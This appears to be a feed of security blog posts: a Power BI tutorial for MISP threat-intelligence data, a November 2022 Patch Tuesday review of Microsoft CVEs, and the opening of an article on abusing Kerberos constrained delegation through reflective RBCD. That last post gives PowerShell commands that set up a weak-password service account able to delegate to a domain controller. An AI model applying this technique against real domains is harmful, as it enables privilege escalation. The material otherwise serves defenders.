We will add an if statement to deal with tags that are just standalone words. But we do not want to break the TLP or PAP tags, so we add that as well. You will have to play with this as needed, as tags can change and new ones are added all the time. You can just add more else if checks to the instruction below. Changing the name of the column is as easy as replacing the string “Inserted Text After Delimiter” with whatever you want. I chose “Short_Tag_Name”. Comparer.OrdinalIgnoreCase tells Power Query M to use a case-insensitive comparer.

= Table.AddColumn(misp_tags, "Short_Tag_Name", each if Text.Contains([name], "tlp:", Comparer.OrdinalIgnoreCase) then [name] else if Text.Contains([name], "pap:", Comparer.OrdinalIgnoreCase) then [name] else if Text.Contains([name], ":") then Text.AfterDelimiter([name], ":") else [name])

Here is what you should have now. Yay!

MISP Tags Split ETL Results
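The branching logic in the formula above can be mirrored in plain Python as a quick sanity check (the tag names here are made up for illustration; the real work happens in Power Query):

```python
def short_tag_name(name: str) -> str:
    # Keep TLP/PAP tags intact (case-insensitive), otherwise take the
    # text after the first colon; standalone tags pass through unchanged.
    lowered = name.lower()
    if "tlp:" in lowered or "pap:" in lowered:
        return name
    if ":" in name:
        return name.split(":", 1)[1]
    return name

print(short_tag_name("tlp:amber"))                        # tlp:amber
print(short_tag_name('misp-galaxy:threat-actor="APT1"'))  # threat-actor="APT1"
print(short_tag_name("phishing"))                         # phishing
```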

Relationship Mapping

Why Auto Mapping in Power BI Doesn’t Work

Power BI tries to help you by finding commonalities in the tables you load and automatically building relationships between them. This is usually not correct, especially when the data comes from an application and was not purpose-built for reporting. We can tell Power BI to stop helping.

Let’s stop the madness.

  1. Go to File, Options and settings, Options
  2. Uncheck all the boxes in the “Relationships” section

Disable Auto Mapping

Once this is complete, click on the Manage relationships button under the Modeling tab of the Ribbon. Delete any relationships you see there.

Managing Relationships

Once your panel looks like the one above, click New…
We can create the relationship using this selection panel…

Create a Relationship

We can also use the graphical method. You can get to the graph by closing the Create and Manage relationship windows and clicking on the Model icon on the left of the Power BI workspace.

Managing Relationships Graphically
Relationship Map

Here we can drag and drop connectors between tables. Depending on your style, you may like one method over the other. I prefer the drag and drop method. To each their own.

Process to Map Tables

To map the relationships of these tables, you need to know a little about MISP and how it works.

  • Events in MISP can have tags, objects, attributes, and galaxies (basically groups of tags), and must be created by an organization.
  • Attributes can have tags and sightings.
  • Objects are made up of Attributes.
  • Warninglists are not directly related but can match against Attributes.
  • Events and Organizations can be blocked by being placed on a corresponding blocklist.
  • There is a table called over_correlating_values that tracks attributes that are very common between many events.

Using this information and user knowledge of MISP, you can map what relates to what. Most tables have an “id” column that is the key of that table. For instance, the tags table column “id” is related to the “tag_id” column of the event_tags table. To make this easier, you can rename the “id” column of the tags table to “tag_id” so that it matches. You will have to go through this process with all the tables. There will be relationships that are not “active”. This happens when multiple relationships between the same tables would create ambiguity in the model: the software cannot know which relationship it should choose, and it does not like this. So, for the model’s sake, you have to pick which one is active by default if there is a conflict. You can use DAX when making visualizations to temporarily activate an inactive relationship if you need to. Great post on this here: https://www.vivran.in/post/understanding-ambiguity-in-power-bi-data-model
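To make the key matching concrete, here is a minimal Python sketch of the tags-to-event_tags relationship described above (toy rows with made-up values; in Power BI this is a drag-and-drop relationship, not code):

```python
# Toy rows mimicking the misp.tags and misp.event_tags tables, with the
# tags "id" column already renamed to "tag_id" so the keys match.
tags = [
    {"tag_id": 1, "name": "tlp:amber"},
    {"tag_id": 2, "name": "phishing"},
]
event_tags = [
    {"event_id": 10, "tag_id": 1},
    {"event_id": 11, "tag_id": 2},
    {"event_id": 12, "tag_id": 1},
]

# One-to-many join: each tag row can match many event_tag rows.
by_tag = {t["tag_id"]: t for t in tags}
joined = [{**et, "name": by_tag[et["tag_id"]]["name"]} for et in event_tags]
for row in joined:
    print(row)
```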

Relationship mapping was the most tedious part for me, but once it is done you should not have to change it again.

Examples of a Relationship Map

Here is what the relationship model should look like when you are done. Now we can start building visualizations!

Example of a Complete Relationship Map

I will leave the rest of the relationship mapping as an exercise for you. It will also help you better understand how MISP uses all this data.

Later we will talk about Power BI templates and the one we are providing to the community.

Making your first visualization

What do you want to visualize

At this stage you have to start looking at your Primary Intelligence Requirements (PIR). Why are you doing this work? What is the question you are answering and who is asking the question?

For example, if your CISO is asking for a constantly updating dashboard of key metrics around the CTI Program then your requirement is just that. You can fulfill this requirement with Power BI Desktop and Power BI Service. So as a first step we need to create some visualizations that will provide insights into the operational status of the CTI program.

Count all the things

To start off easy, we will just make some charts that count the number of Events and Attributes that are currently in our MISP instance during a certain time window.
To do this we will go back to Power BI Desktop and the Report workspace.

Starting to Create a Visualization

So let’s start with Events and display them in a bar chart over time. Expand the misp events table in the Fields panel on the left. Select event_id and check the box. This will place that field in the X-axis; drag it down to the Y-axis, which will change it to a count. Then select the Date field in the Events table. This will create the bar chart in the screenshot below. You will have to resize it by dragging the corner of the chart as you would with any other window.

Histogram Example

We need to filter down on the year the Event was created. Drag Year in the Date field hierarchy over to the Filter on all pages panel. Then change the filter type to basic. Then select the last 5 years to get a small dataset. This will be different depending on the amount and age of your MISP dataset.

Filtering Visuals

Nice. Now there is a thing that Power BI does that can be annoying. If you look at data over a long period of time, it will, by default, group all of the data by the current view’s bucket, regardless of any higher-order bucket. That probably makes no sense, so here is an example: if you are looking at data over two years and want to see how many events occurred per month, it will combine the data for the two years and show you the totals for the months Jan–Dec. It also concatenates the labels by default. See below: this is five years of data, but it is only showing the sum of all events that happened in each month over those five years.

Time Buckets Not Correct

To change this, you can click on the forked arrow to the left of the double arrow highlighted in the screenshot above. This will split the hierarchy. You will have to drill up to the highest level of the hierarchy first using the single up arrow; click it until you are at years only. We can also turn off label concatenation. See the highlighted areas in the screenshot below. Now this is more like it!

Time Buckets Correctly Configured

Using a Slicer as a time filter

Now we need an easier way to change the date range that we are viewing. Let’s add a Slicer for that! Drag the Slicer visualization to the canvas. You can let it live on top of the visualization or reorganize. Now drag the Date field of the event table into the new visualization. You should be left with a slider that can now filter the main visualization. Awesome. See the example below.

Slicer Example

You can also change the way the Slicer looks or operates with the options menu in the top right. See below.

Different Types of Slicers

Ask questions about your data

Let’s add some additional functionality to our report. Click on the three dots, … , in the visualization selection panel. Then click Get More Visuals, then select or search for and select Text Filter by Microsoft. Add it to your environment. Then add it and the Q&A visualizations to your canvas. To use the Text Filter you need to give it fields to search in. Add the value1 field from the attributes table. This is the main field in the attributes table that stores your indicator of compromise or IoC for short.

Text Filter

After you rearrange some stuff to make everything fit, ask the following question in your Q&A visual, “How many attribute_id are there?”. Give it a minute and you should get back a count of the number of attributes in the dataset. Nice!

Now do a Text Search in that visual for an IP you know is in your MISP instance. I know we have the infamous 8.8.8.8 in ours, IDS flag set to false of course :). The text search will filter the Q&A answer, and it should show you how many times that value is seen in your dataset. It also filters your bar chart to show you when the events that contain that data were created! If your bar chart doesn’t change, check your relationship maps; it might be the filtering direction. Play with this until your data behaves the way you need it to. Imagine the capabilities of this if you get creative! You can also mess with the built-in design templates to make this sexier, or you can manually change backgrounds, borders, etc.

Example Visuals

Add in Geo-location data

Before we start: Sign up for a free account here: https://www.ip2location.io/

Record your API key; we will use it soon.

Let’s also create a new transform that will add GeoIP data to the IP addresses in our attributes table.

We are going to start by creating a new table with just IP attributes.

Click on Transform data in the Ribbon. Then right click on the misp attributes table.

Duplicate the table and then right click on the new table and select rename. I renamed mine “misp ip_addresses_last_30_days_geo”.

Now we are going to do some filtering to shrink this table to the last 30 days’ worth of IP attributes. If we did not do this, we might burn through our API credits due to the number of IPs in our MISP instance. Of course, you can change the date range as needed for your use case.

Right-click the type column and filter to just ip-src and ip-dst.

Selecting Attribute Types to Filter Column

Then filter to the last 30 days. Right click the timestamp column and open Date/Time Filters > In the Previous…

Filter Tables by Time

In the dialog box, enter your time frame. I entered the last 30 days, as below.

Filtering to the Last 30 Days
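The two filter steps above amount to the following selection logic, sketched here in Python with fabricated rows (the real filtering happens in Power Query):

```python
from datetime import datetime, timedelta, timezone

def recent_ip_attributes(rows, now, days=30):
    # Keep only ip-src/ip-dst attributes whose timestamp falls within the
    # last `days` days, mirroring the type filter plus the Date/Time filter.
    cutoff = now - timedelta(days=days)
    return [r for r in rows
            if r["type"] in ("ip-src", "ip-dst") and r["timestamp"] >= cutoff]

now = datetime(2022, 11, 30, tzinfo=timezone.utc)
rows = [
    {"type": "ip-src", "value1": "8.8.8.8", "timestamp": now - timedelta(days=5)},
    {"type": "domain", "value1": "example.com", "timestamp": now - timedelta(days=5)},
    {"type": "ip-dst", "value1": "1.1.1.1", "timestamp": now - timedelta(days=60)},
]
print(recent_ip_attributes(rows, now))  # only the 8.8.8.8 row survives
```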

Then we are going to follow the instructions that can be found at the following blog: https://www.fourmoo.com/2017/03/14/power-bi-query-editor-getting-ip-address-details-from-ip-address/

In that blog, you create a custom function like the one below. Follow the instructions there; it is a great read.

fn_GetIPAddressDetails

let
    Source = (#"IP Address" as text) =>
        let
            Source = Json.Document(Web.Contents("https://api.ip2location.io/?ip=" & #"IP Address" & "&key=<ip2location_api_key>")),
            #"Converted to Table" = Record.ToTable(Source),
            #"Transposed Table" = Table.Transpose(#"Converted to Table"),
            #"Promoted Headers" = Table.PromoteHeaders(#"Transposed Table")
        in
            #"Promoted Headers"
in
    Source

Once you have this function saved, you can use it to create a new set of columns in your new IP address table, the one I named “misp ip_addresses_last_30_days_geo” earlier. Use the value1 column for the argument of the function.
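For reference, a rough Python equivalent of that custom function might look like this (a sketch: the helper names are mine, the endpoint and `ip`/`key` query parameters are the ones shown in the M code above, and the key placeholder must be replaced with your own):

```python
import json
import urllib.parse
import urllib.request

API_KEY = "<ip2location_api_key>"  # placeholder, use your own key

def build_url(ip: str) -> str:
    # Same endpoint and query parameters as the Power Query M function.
    return "https://api.ip2location.io/?" + urllib.parse.urlencode(
        {"ip": ip, "key": API_KEY})

def get_ip_details(ip: str) -> dict:
    # One record per IP, analogous to the function's promoted-headers row.
    with urllib.request.urlopen(build_url(ip)) as resp:
        return json.load(resp)

print(build_url("8.8.8.8"))
```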

Example of GeoIP locations and Text Filter on Tag Name

Sharing with the community

On the NVISO CTI GitHub page, you will find a Power BI template file that has all the Power BI related steps above done for you. All you have to do is change the data source to your MISP instance and get an API key for https://www.ip2location.io/.

Download the template file located here: https://github.com/NVISOsecurity/nviso-cti/tree/master/Power_BI

Use the import function under the File menu in the Power BI Desktop ribbon.

Import Function

Import the template. There will be errors, as you have not specified your data source yet. Cancel the login dialog box and close the Refresh dialog box. It will show the IP of my dev MISP; you will need to specify your own data source. Select Transform data in the ribbon and then Data source settings. Here you can edit the source information and add your credentials. (Make sure you have configured your MISP instance for remote MySQL access and installed the MySQL .NET connector.)

Close Prompt to Update Creds
Change Data Source
Accessing Source Settings
Change MySQL Source
Adding Your Creds 1

Make sure you set the encryption checkbox as needed.

Adding Your Creds 2

Select Transform Data in the ribbon again and then Transform data to open the Power Query editor.

Accessing Power Query to Edit Custom Function

Then select the custom function for geoip and use the Advanced Editor to add your API key.

Add Your API Key

Now, if your data source settings and credentials are correct, you can Close and Apply and it should start pulling in the data from your configured MISP instance.

Conclusion

A note of caution with all this: check your source data to make sure what you are seeing in Power BI matches what you see in MISP. As my brother-in-law and data analytics expert, Joshua Henderson, says: “Always validate that what your outcome in Power BI/Tableau is correct for what you have in the DB. I will either already know what the outcome should be in my viz tool, or I will do it after I create my viz. Far too often I see data counts off and it can be as small as a mis-click on a filter, or as bad as your mapping being off and you are dropping a large percentage of say attribute_ids. It also can help you with identifying issues; either with your database not updating correctly, or an issue with your data refresh settings.”

Now that you have built your first visualization, I will leave it to you to build more, and I would love to see what you come up with. In the next blog I will demonstrate how to publish this data to the Power BI Service and use the Data Gateway to automate dataset refresh jobs! Once published to the Power BI Service, you will be able to share your reports and create and share dashboards built from individual visuals in your reports. Even view all this on your phone!!

I also leave you with this idea. Now that your MISP data is in Power BI, what other data can you pull into Power BI to pair with this data? SIEM data? Data from your XDR/EDR? Data from your SOC’s case management solution? Data from your vulnerability management platform? You get the idea!

Until next time!

Thanks for reading!!!
Robert Nixon
@syloktools

Rock On!

The November 2022 Security Update Review

8 November 2022 at 18:28

Welcome to the penultimate Patch Tuesday of 2022. As expected, Adobe and Microsoft have released their latest security updates and fixes to the world. Take a break from your regularly scheduled activities and join us as we review the details of their latest security offerings.

Adobe Patches for November 2022

For November, Adobe released no patches at all. They’ve released as few as one in the past, but this is the first month in the last six years where they had no fixes at all. Perhaps the U.S. elections play a factor, as Patch Tuesday hasn’t fallen on Election Day since 2016. Whatever the cause, enjoy a month of no Adobe updates.

Microsoft Patches for November 2022

This month, Microsoft released 64 new patches addressing CVEs in Microsoft Windows and Windows Components; Azure and Azure Real Time Operating System; Microsoft Dynamics; Exchange Server; Office and Office Components; SysInternals; Visual Studio; SharePoint Server; Network Policy Server (NPS); Windows BitLocker; and Linux Kernel and Open Source Software. This is in addition to five other CVEs from third parties being integrated into Microsoft products bringing the total number of fixes to 69. Eight of these CVEs were submitted through the ZDI program.

Of the 64 new patches released today, 11 are rated Critical and 53 are rated Important in severity. This volume is similar to previous November releases. It also pushes Microsoft over the number of fixes they released in 2021 and makes this year their second busiest ever for patches.

One of the new CVEs released this month is listed as publicly known and six others are listed as being in the wild at the time of release, which includes the two Exchange bugs listed as under active attack since September. Let’s take a closer look at some of the more interesting updates for this month, starting with those Exchange fixes we’ve been waiting for:

-       CVE-2022-41082 – Microsoft Exchange Server Remote Code Execution Vulnerability
-       CVE-2022-41040 – Microsoft Exchange Server Elevation of Privilege Vulnerability
These patches address the recent Exchange bugs that are currently being used in active attacks. They were expected last month, but they are finally here (along with several other Exchange fixes). These bugs were purchased by the ZDI at the beginning of September and reported to Microsoft at the time. At some point later, they were detected in the wild. Microsoft has released several different mitigation recommendations, but the best advice is to test and deploy these fixes. There were some who doubted these patches would release this month, so it’s good to see them here.

-       CVE-2022-41128 – Windows Scripting Languages Remote Code Execution Vulnerability
This bug in JScript is also listed as being exploited in the wild. An attacker would need to lure a user to either a specially crafted website or server share. In doing so, they would get their code to execute on an affected system at the level of the logged-on user. Microsoft provides no insight into how widespread this may be but considering it’s a browse-and-own type of scenario, I expect this will be a popular bug to include in exploit kits.

-       CVE-2022-41091 – Windows Mark of the Web Security Feature Bypass Vulnerability
If you follow Will Dormann on Twitter, you probably have already read quite a bit about these types of bugs. Mark of the Web (MoW) is meant to be applied to files downloaded from the Internet. These files should be treated differently and receive security warning dialogs when accessing them. This vulnerability is also listed as being under active attack, but again, Microsoft provides no information on how widespread these attacks may be.

-       CVE-2022-41073 – Windows Print Spooler Elevation of Privilege Vulnerability
The legacy of PrintNightmare continues as threat actors continue to mine the vast attack surface that is the Windows Print Spooler. While we’ve seen plenty of other patches since PrintNightmare, this one is listed as being in the wild. While not specifically called out, disabling the print spooler should be an effective workaround. Of course, that breaks printing, but if you’re in a situation where patching isn’t feasible, it is an option.

-       CVE-2022-41125 – Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
The final bug listed under active attack for November is this privilege escalation in the “Cryptography Application Programming Interface - Next Generation” (CNG) Key Isolation Service. An attacker can abuse this bug to run their code at SYSTEM. They would need to be authenticated, which is why bugs like these are often paired with some form of remote code execution exploit. As with all the other in-the-wild exploits, there’s no indication of how widely this is being used, but it’s likely somewhat targeted at this point. Still, test and deploy the updates quickly.

Here’s the full list of CVEs released by Microsoft for November 2022:

CVE Title Severity CVSS Public Exploited Type
CVE-2022-41091 Windows Mark of the Web Security Feature Bypass Vulnerability Important 5.4 Yes Yes SFB
CVE-2022-41040 Microsoft Exchange Server Elevation of Privilege Vulnerability Critical 8.8 No Yes EoP
CVE-2022-41082 Microsoft Exchange Server Remote Code Execution Vulnerability Critical 8.8 No Yes RCE
CVE-2022-41128 Windows Scripting Languages Remote Code Execution Vulnerability Critical 8.8 No Yes RCE
CVE-2022-41125 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2022-41073 Windows Print Spooler Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2022-39327 * GitHub: CVE-2022-39327 Improper Control of Generation of Code ('Code Injection') in Azure CLI Critical N/A No No RCE
CVE-2022-41080 Microsoft Exchange Server Elevation of Privilege Vulnerability Critical 8.8 No No EoP
CVE-2022-38015 Windows Hyper-V Denial of Service Vulnerability Critical 6.5 No No DoS
CVE-2022-37967 Windows Kerberos Elevation of Privilege Vulnerability Critical 7.2 No No EoP
CVE-2022-37966 Windows Kerberos RC4-HMAC Elevation of Privilege Vulnerability Critical 8.1 No No EoP
CVE-2022-41039 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability Critical 8.1 No No RCE
CVE-2022-41088 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability Critical 8.1 No No RCE
CVE-2022-41044 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability Critical 8.1 No No RCE
CVE-2022-41118 Windows Scripting Languages Remote Code Execution Vulnerability Critical 7.5 No No RCE
CVE-2022-3602 * OpenSSL: CVE-2022-3602 X.509 certificate verification buffer overrun High 7.5 No No RCE
CVE-2022-3786 * OpenSSL: CVE-2022-3786 X.509 certificate verification buffer overrun High 7.5 No No DoS
CVE-2022-41064 .NET Framework Information Disclosure Vulnerability Important 5.8 No No Info
CVE-2022-23824 * AMD: CVE-2022-23824 IBPB and Return Address Predictor Interactions Important Unknown No No Info
CVE-2022-41085 Azure CycleCloud Elevation of Privilege Vulnerability Important 7.4 No No EoP
CVE-2022-41051 Azure RTOS GUIX Studio Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41099 BitLocker Security Feature Bypass Vulnerability Important 4.6 No No SFB
CVE-2022-39253 * GitHub: CVE-2022-39253 Local clone optimization dereferences symbolic links by default Important 5.5 No No Info
CVE-2022-41066 Microsoft Business Central Information Disclosure Vulnerability Important 4.4 No No Info
CVE-2022-41096 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41105 Microsoft Excel Information Disclosure Vulnerability Important 7.8 No No Info
CVE-2022-41106 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41063 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41104 Microsoft Excel Security Feature Bypass Vulnerability Important 5.5 No No SFB
CVE-2022-41123 Microsoft Exchange Server Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41078 Microsoft Exchange Server Spoofing Vulnerability Important 8 No No Spoofing
CVE-2022-41079 Microsoft Exchange Server Spoofing Vulnerability Important 8 No No Spoofing
CVE-2022-41047 Microsoft ODBC Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2022-41048 Microsoft ODBC Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2022-41107 Microsoft Office Graphics Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41062 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2022-41122 Microsoft SharePoint Server Spoofing Vulnerability Important 6.5 No No Spoofing
CVE-2022-41120 Microsoft Windows Sysmon Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41060 Microsoft Word Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2022-41103 Microsoft Word Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2022-41061 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-38023 Netlogon RPC Elevation of Privilege Vulnerability Important 8.1 No No EoP
CVE-2022-41056 Network Policy Server (NPS) RADIUS Protocol Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2022-41097 Network Policy Server (NPS) RADIUS Protocol Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2022-41119 Visual Studio Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41100 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41045 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41093 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41114 Windows Bind Filter Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2022-41095 Windows Digital Media Receiver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41050 Windows Extensible File Allocation Table Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41098 Windows GDI+ Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2022-41052 Windows Graphics Component Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2022-41086 Windows Group Policy Elevation of Privilege Vulnerability Important 6.4 No No EoP
CVE-2022-37992 Windows Group Policy Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41057 Windows HTTP.sys Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41055 Windows Human Interface Device Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2022-41053 Windows Kerberos Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2022-41049 Windows Mark of the Web Security Feature Bypass Vulnerability Important 5.4 No No SFB
CVE-2022-41058 Windows Network Address Translation (NAT) Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2022-41101 Windows Overlay Filter Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41102 Windows Overlay Filter Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41090 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability Important 5.9 No No DoS
CVE-2022-41116 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability Important 5.9 No No DoS
CVE-2022-41054 Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-38014 Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2022-41113 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41109 Windows Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2022-41092 Windows Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP

* Indicates this CVE had previously been assigned by a 3rd-party and is now being incorporated into Microsoft products.

There are four additional bugs in Exchange Server receiving fixes this month, and three of those were reported by ZDI Vulnerability Researcher Piotr Bazydło. Most notably, the privilege escalation bug is due to Exchange having a hardcoded path to a file on the “D:” drive. If a “D:” exists and an attacker puts a DLL in the specified folder, Exchange will load the DLL. By default, low-privileged users have write access to the “D:” drive (assuming it exists). Another vector would be if the low-privileged attacker can insert an optical disk or attach an external drive that will be assigned the letter “D:”. Hard to believe a hard-coded path still exists within Exchange, but here we are. The two spoofing bugs would allow an authenticated attacker to obtain the NTLMv2 challenge and eventually perform further NTLM Relaying attacks. I have a strong premonition many Exchange administrators have a long weekend in front of them.

Looking at the remaining Critical-rated fixes, the two privilege escalation bugs in Kerberos stand out. You’ll need to take additional actions beyond just applying the patch. Specifically, you’ll need to review KB5020805 and KB5021131 to see the changes made and next steps. Microsoft notes this is a phased rollout of fixes, so look for additional updates to further impact the Kerberos functionality. There’s another patch for Scripting Languages. In this case, it’s JScript and Chakra, and this one is not listed as under active attack. There are three Critical-rated fixes for Point-to-Point Tunneling Protocol (PPTP). This seems to be a continuing trend of researchers looking for (and finding) bugs in older protocols. If you rely on PPTP, you should really consider upgrading to something more modern. There’s a Critical-rated denial-of-service (DoS) bug in Hyper-V, which is pretty unusual to see. DoS bugs rarely get the Critical tag, but Microsoft states, “Successful exploitation of this vulnerability could allow a Hyper-V guest to affect the functionality of the Hyper-V host.” I guess that’s severe enough to earn a Critical rating despite the 6.5 CVSS score. The fix for the Azure CLI was actually released a couple of weeks ago, and it’s getting documented now.

In addition to the fixes we’ve already discussed, there are 11 other patches for remote code execution vulnerabilities, including a memory corruption bug in the Windows Graphics Component reported by ZDI Vulnerability Researcher Hossein Lotfi. There are also multiple RCE bugs in various Office components, including one from ZDI Vulnerability Researchers Mat Powell and Michael DePlante. For these cases, user interaction would be required – the Preview Pane isn’t an exploit vector. There’s an authenticated SharePoint RCE, but a default user has the needed permissions to take over a SharePoint server. The vulnerability in Azure RTOS would require a user to run specially crafted code, so a level of social engineering would likely be needed to exploit this bug. The final two RCE bugs are in the ODBC driver, and these would require some social engineering to exploit as well. An attacker would need to convince someone to connect to their SQL server via ODBC. If they can do that to an affected system, they could execute code remotely on the client.

A total of 26 bugs in this release are Elevation of Privilege (EoP) bugs, including those already mentioned. The majority of these require an authenticated user to run specially crafted code on an affected system, but a few stand out. The first is the fix for Netlogon, which reads similar to the aforementioned Kerberos fixes. Microsoft is rolling out updates in phases, and admins should review KB5021130 for additional steps. The bug in Azure CycleCloud has a brute-force component, which definitely makes exploitation more difficult. Still, if you are using CycleCloud to manage your HPC environments on Azure, ensure you get it updated. The fixes for ALPC note the bugs could be used to escape a contained execution environment. While certainly not the first bugs to do so, I don't recall Microsoft documenting this before now. Finally, there's an EoP in the Sysinternals Sysmon tool. These tools are often used by incident responders, so definitely make sure you have an updated version before heading out to recover a compromised system. 

The November release includes eight new fixes for information disclosure bugs. Most of the info disclosure vulnerabilities only result in leaks consisting of unspecified memory contents. There is one notable exception. The vulnerability in Business Central requires admin credentials but could lead to the disclosure of integration secrets that are owned by a different partner. Presumably, you would be able to impersonate the other client with this info.

Four total Security Feature Bypass bugs are getting fixed this month, including the patch for the MoW bug being actively exploited. There’s another fix for a MoW bug, but this one is not listed as under active attack. The fix for Excel addresses a bug that would bypass the content check in the INDIRECT function. More notably, the bug in BitLocker could allow an attacker with physical access to bypass the Device Encryption feature and access the encrypted data. Preventing this is pretty much the “one job” of Device Encryption, so regardless of exploitability, this is a significant bypass.

Today’s release also includes fixes for five additional DoS bugs. Four of these impact network protocols: PPTP, RADIUS, and Network Address Translation (NAT). A successful attack on one of these protocols would cause the service to stop responding. The same is true of the bug in Kerberos, which could impact logging on and other functionality that relies on the Kerberos service.

There is one spoofing bug in SharePoint Server, but beyond the authentication requirement, there's no information regarding the exploit scenario.

Finally, you may have heard of some OpenSSL bugs that had everyone abuzz before their release. To say they fizzled out is a bit of an understatement. Still, the fixes for Microsoft products are included in this release.

There is one new advisory this month adding defense-in-depth functionality to Microsoft Office. The new feature provides hardening around IRM-protected documents to ensure the trust-of-certificate chain. The latest servicing stack updates can be found in the revised ADV990001.

Looking Ahead

The final Patch Tuesday of 2022 will be on December 13, and we’ll return with details and patch analysis then. Be sure to catch the Patch Report webcast on our YouTube channel. It should be posted in just a few hours. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!


How to mimic Kerberos protocol transition using reflective RBCD

7 November 2022 at 16:59

As I often look for misconfigurations involving Kerberos delegation, I realized I was missing an interesting element while playing with the Kerberos protocol extensions S4U2Self and S4U2Proxy. We know that delegation is dangerous if an account allows delegating third-party user authentication to a privileged resource. In the case of constrained delegation, all it takes is finding a privileged account in one of the SPNs (Service Principal Names) set in the msDS-AllowedToDelegateTo attribute of a compromised service account.
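To hunt for accounts like this, one can query the directory for objects whose msDS-AllowedToDelegateTo attribute is populated. Below is a minimal sketch of building such an LDAP filter (the helper function and example SPN are mine; only the attribute name comes from Active Directory):

```python
# Sketch: build an LDAP filter matching accounts configured for classic
# constrained delegation, optionally narrowed to a target SPN substring.
# Feed the resulting string to any LDAP client bound to the domain.
from typing import Optional

def constrained_delegation_filter(target_spn: Optional[str] = None) -> str:
    base = "(&(objectClass=user)(msDS-AllowedToDelegateTo=*)"
    if target_spn:
        # e.g. narrow to delegations aimed at a specific host
        base += f"(msDS-AllowedToDelegateTo=*{target_spn}*)"
    return base + ")"

print(constrained_delegation_filter("DC01.ALSID.CORP"))
```

Any hit whose delegation target runs under a privileged object (such as a Domain Controller) is worth a closer look.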

I asked myself whether it's possible to exploit a case of constrained delegation without protocol transition, since S4U2Self does not provide valid "evidence" in that case, as we will see. Is there a way to mimic the protocol transition?

Even though I had read quite a few articles dealing with Kerberos delegation, I realized that this was the crux of Elad Shamir's research Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory, and that the answer lies in what is called Reflective Resource-Based Constrained Delegation (Reflective RBCD).

While Reflective RBCD is not a new technique, it does not command much visibility in Google searches, so I thought it would be interesting to share my thoughts about mimicking protocol transition.

Kerberos Constrained Delegation

With the Kerberos constrained delegation, if a service account TestSvc has the attribute msDS-AllowedToDelegateTo set with an SPN targeting a service running under a privileged object — such as CIFS on a Domain Controller — TestSvc may impersonate an arbitrary user to authenticate to the service running in the security context of the privileged object — in this case, the DC — which is very dangerous.

Delegating to a domain controller

However, in order to exploit Kerberos constrained delegation, the literature usually says that we also need protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION set on TestSvc) to generate a forwardable service ticket for ourselves (S4U2Self) and to pass it to S4U2Proxy, which requests a new service ticket to access our privileged object. Here, the protocol transition (S4U2Self) is required to impersonate an arbitrary user.

This makes us wonder: is there a way to exploit constrained delegation (assuming the service account is compromised) without protocol transition? More importantly, is there a way to impersonate any user without it? And if not, why?

Environment setup

TestSvc is our compromised service account;

  • It is unprivileged, being only a member of the Domain Users group
  • It has an SPN, required for delegating
  • It can also delegate to the domain controller DC01
PS J:\> New-ADUser -Name "TestSvc" -SamAccountName TestSvc -DisplayName "TestSvc" -Path "CN=Users,DC=alsid,DC=corp" -AccountPassword (ConvertTo-SecureString "Password123" -AsPlainText -Force) -Enabled $True -PasswordNeverExpires $true -ChangePasswordAtLogon $false
PS J:\> Set-ADUser -Identity TestSvc -Replace @{"servicePrincipalName" = "MSSQLSvc/whatever.alsid.corp" }
PS J:\> Set-ADUser -Identity TestSvc -Add @{'msDS-AllowedToDelegateTo'=@('HOST/DC01.ALSID.CORP')}

Service Ticket as an evidence

